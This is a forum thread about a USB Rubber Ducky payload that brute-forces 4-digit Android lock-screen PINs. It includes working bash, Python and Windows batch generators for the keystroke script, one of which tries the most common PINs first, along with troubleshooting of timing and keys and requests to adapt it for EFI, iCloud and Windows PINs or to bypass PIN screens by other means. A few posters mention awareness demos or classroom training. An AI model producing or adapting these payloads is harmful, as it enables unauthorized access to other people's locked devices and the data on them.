Darren Kitchen

[Payload] Android Brute Force 4-digit pin

62 posts in this topic

I saw Darren's bash code, (I'm not gonna lie I was intimidated) but after running it, COOL!!! Now I Just need to find a willing test subject (Locked in for 2 yrs on my iPhone :unsure: )

0

Share this post


Link to post
Share on other sites

Love the shows!

Question: Is this the only way to do this? I would think to connect the phone to a normal computer and run the needed scripts from there will do the same?

Question: What kind of software OS is running on the chip?

0

Share this post


Link to post
Share on other sites

Q1: No see above.

Q2: The chip is a micro-controller, not an actual full-blown OS, its pre-programmed with a set of instructions triggered/executed by a series of interrupts.

0

Share this post


Link to post
Share on other sites

Just playing around with the Android 4 digit pin code and a Samsung Galaxy S2.

I noticed the S2 (maybe it depends on the version) didn't respond to the ENTER key on a external keyboard while in "standbye" mode. It will respond to the ESC key so if you have this problem change the DELAY 5000\nENTER to DELAY 5000\nESC.

If you want to playaround with the rubber ducky script, first give it a try with an external keyboard. Maybe your timeout settings are different so you need to change the delay settings.

0

Share this post


Link to post
Share on other sites

This could work incredibly well when "Quick unlock" is enabled in Android's security settings, anyone tried it out yet?

0

Share this post


Link to post
Share on other sites

Been trying to the Ducky with paylaod script to brute force 4 digit phone lock, it times out after 3,000 attempts of 10,000 ???

Any thoughts as to why it stops at 3,000 when the script is for 10,000

Thanks in advance

0

Share this post


Link to post
Share on other sites

Can someone please tell me how to insert the payloads in the USB Rubber Ducky and does anyone have the payload for EFI PIN's (4 digits)

0

Share this post


Link to post
Share on other sites

Can someone please tell me how to insert the payloads in the USB Rubber Ducky and does anyone have the payload for EFI PIN's (4 digits)

im looking for the same. I have the code for Teensy 3. but i cant seem to get the payload to work correctly on the rubber duck.

These links list the codes used for the teensy 3 For EFI brute forcing and icould pin brute forcing.. Can someone PLEASE take a look at it and see if it need to be edited to work on the rubber ducky

http://orvtech.com/en/howto/atacar-efi-pin-macbook-pro/#UPDATE

http://orvtech.com/en/howto/ataque-fuerza-bruta-pin-icloud/

0

Share this post


Link to post
Share on other sites

the adapter that will work for the iPhone is called the Apple Camera adapter. I have a few apple devices, and it works for all of them. I have yet to try the iPhone5 yet though as this requires the new camera adapter. Now we just need to get the timing/code corrected as the iPhone is a bit different than the Android.

Awesome Work!! Keep it up Darren!!

0

Share this post


Link to post
Share on other sites

Part Number for iPhone up to 4S: MC531ZM

Part Number for iPhone 5: MD821ZM

0

Share this post


Link to post
Share on other sites

To adapt Darren's simple script to generate android.txt on OSX, you need Mac Ports installed and you need to install gsed (gnu-sed), as gnu-sed is slightly different to OSX's default bsd-sed.

port install gsed
then:

echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | gsed '0~5 s/$/\nWAIT/g' | gsed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | gsed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
Not sure whats going wrong with cygwin?

How can i modify this script to put a delay between each key stroke. so basically enter 0 delay 500ms enter 0 delay 500ms enter 0 delay 500ms enter 1 etc

0

Share this post


Link to post
Share on other sites

Hey all, I'm trying to execute this payload on my ASUS tablet and it doesn't respond to ENTER, as suggested ive tried ESC along with OK,SPACE,RETURN,SUBMIT and TAB... any suggestions would be appriciated!

0

Share this post


Link to post
Share on other sites

Hi great Ducky payload!

This works great on my android platform of 4.4.2 Samsung but is that any update or way through more recent android versions, I have tested it on the HTC one M8 and the script begins to run and navigates to the pin screen but the keypad will only work from physical access to the phone and not by the ducky or usb keyboard.

Any advice or tips would be great

Jake

0

Share this post


Link to post
Share on other sites

I'll be demoing this on next weeks Hak5 episode but figured I'd post it here first and get some feedback. Thus far it works perfectly on a Galaxy Nexus running the latest Android 4.2.1. I've also tested it with a Galaxy Note 2 running 4.2.1 and it ran as expected.

20121205_125338.jpg

I'm very surprised that with the stock Android OS and recommended settings of setting a PIN code this was possible. I had expected the phone to reset or format after 100 attempts or something like that.

With a 4 digit PIN and the default of 5 tries followed by a 30 second timeout you're looking at a best case scenario of exhausting the key space in about 16.6 hours. Not bad all things considered. If you're the NSA or the Mafia that's totally reasonable, I'd say. Thankfully the USB Rubber Ducky never gets tired, bored or has to pee.

Rather than post the nearly 600K duckyscript I'll just post the bit of bash I used to create it. You could modify it to do 5 digit, but that would take 166 hours. 10 digit would take 1902.2 years. ;-)

echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt

will this script work against windows 10 pins as it is?

0

Share this post


Link to post
Share on other sites

If anyone is having problems with the bash script, I have written something similar in Python. I mostly use the Raspberry Pi to do all my encoding. This script will inject 20 of the most common pin codes first, and then brute force afterwards.

#!/usr/bin/python

defaultList = ['1234', '1111', '0000', '1212', '7777', '1004', '2000', '4444', '2222', '6969', '9999', '3333', '5555', '6666', '1122', '1313', '8888', '4321', '2001', '1010'];
	
def main():
	fileOpen = open("android_payload.txt", "w+")
	fileOpen.write("DELAY 5000\n")
	
	for x in defaultList:
		fileOpen.write("STRING %s\n" % x);
		fileOpen.write("ENTER\nDELAY 500\n")
		
	for w in range(0,10):
		for z in range(0,10):
			for y in range(0,10):
				for x in range(0,10):
					fileOpen.write("STRING %d%d%d%d\n" % (w,z,y,x))
					if (x % 2) == 0:
						fileOpen.write("ENTER\n")
					fileOpen.write("ENTER\nDELAY 500\n")
					
		 
	fileOpen.close()

main()

2

Share this post


Link to post
Share on other sites

I am new to this program.script and USB Ducky. We use windows. I went to the online tool USB ducky toolkit to implement the code referenced above. Can someone help me recode it to work in the ducky toolkit. I would like to show this exercise on our training phones in class. Thank you.

0

Share this post


Link to post
Share on other sites

What OS are you using? And is it the code from the first post?

The bash code from the first post cannot be directly imported into the online compiler. Although if you trust me as forum admin, all around good guy, etc :P I can compile the code and send you the .bin to use for your class.

0

Share this post


Link to post
Share on other sites

"Although if you trust me as forum admin, all around good guy, etc :P I can compile the code and send you the .bin to use for your class"

I am using it on Samsung note phones with 4 digit pin set. It would be awesome to have you create the bin for me. I still would like to learn how to recreate the script in the toolkit if possible. My issue is the number creation I think. Thanks

0

Share this post


Link to post
Share on other sites

I am running CYGWIN and am having some problems with the script. Can anyone see what is happening with the script? Here is my command line.

C:\Users\UserName\Desktop>echo DELAY 5000 > android_brute-force_0000-9999.txt; ec

ho {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$

/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTE

R\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt

C:\Users\UserName\Desktop>dir android*

Volume in drive C has no label.

Volume Serial Number is 2499-C7D7

Directory of C:\Users\UserName\Desktop

07/07/2012 01:03 AM 165 Android Paths.txt

08/30/2012 08:00 PM 50 Android SDK Path.txt

12/09/2012 02:26 PM 63 android_brute-force_0000-9999.txt

3 File(s) 278 bytes

0 Dir(s) 831,818,436,608 bytes free

C:\Users\UserName\Desktop>type android_brute-force_0000-9999.txt

DELAY 5000 ; echo {0000..9999}

STRING

DELAY 1000

ENTER

ENTER

C:\Users\UserName\Desktop>

Instead of using Linux terminal, I made a Batch script for this, it does the same thing,

Here is the code;

@echo off
setlocal
set NUM=0
set COUNT=0

echo REM Author: Siem>>input.txt
echo REM Idea taken from: Darren Kitchen
echo REM Description: Bruteforcer>>input.txt
echo DELAY 1000>>input.txt
echo.>>input.txt
echo ESC>>input.txt
echo DELAY 500>>input.txt
echo STRING 0000>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo.>>input.txt

:START
cls
IF %COUNT% EQU 5 (set COUNT=0 & call :WAIT)
IF %NUM% LEQ 9 (set ZERO=000)
IF %NUM% GTR 9 (set ZERO=00)
IF %NUM% GTR 99 (set ZERO=0)
IF %NUM% GTR 999 (set ZERO=%)
IF %NUM% EQU 9999 (pause & exit)
echo DELAY 500>>input.txt
echo STRING %ZERO%%NUM%>>input.txt
echo ENTER>>input.txt
echo %ZERO%%NUM%
set /a NUM=%NUM% + 1
set /a COUNT=%COUNT% +1
goto START

:WAIT
echo.>>input.txt
echo REM Wait 30 seconds>>input.txt
echo DELAY 30000>>input.txt
echo ESC>>input.txt
echo DELAY 500>>input.txt
echo STRING 0000>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo.>>input.txt

You can change the delay a bit, I am still testing it, but this echos 0000..9999 without using Linux.

~Siem

0

Share this post


Link to post
Share on other sites

Hi,

I'm new to the forum and wondered if someone might be able to help me. I've been trying to get the Android brute force working for an awareness demo; however I'm not having much luck. I ran the bash script on the original post and created a new inject.bin but nothing happens when I insert it into the phone!

Any help would be gratefully received.

I have Samsung GT-S5830i Android version 2.3.6

Thanks

0

Share this post


Link to post
Share on other sites

Anyone have any suggestions as to how to keep the phone powered when attempting 5-pin code ? Doubt this phone will survive 160+ hours lol

I've tried using a Targus USB Hub, however I don't think the Data from the Rubber Ducky can traverse through the hub into to the micro usb otg to usb android adapter.. unless I'm doing something wrong- which I don't doubt lol

I guess an alternative is to break up the code into smaller chunks.. 00000-09999, 10000-19999, 20000-29999, and so on. would take forever lol 

any help would greatly be appreciated. cheers!

0

Share this post


Link to post
Share on other sites

The phone may not support USB keyboard or the OTG cable you are using may not be working properly.

Try running the duck in a notepad on your computer to see that it is typing things correctly to eliminate that variable.

0

Share this post


Link to post
Share on other sites

So I've run the ducky script in notepad and I dont believe the galaxy core prime is compatable. (Doesn't accept a usb keyboard) any other suggestions on running a brute force pin hack or maybe another method to bypass the pin screen?

0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now

  • Recently Browsing   0 members

    No registered users viewing this page.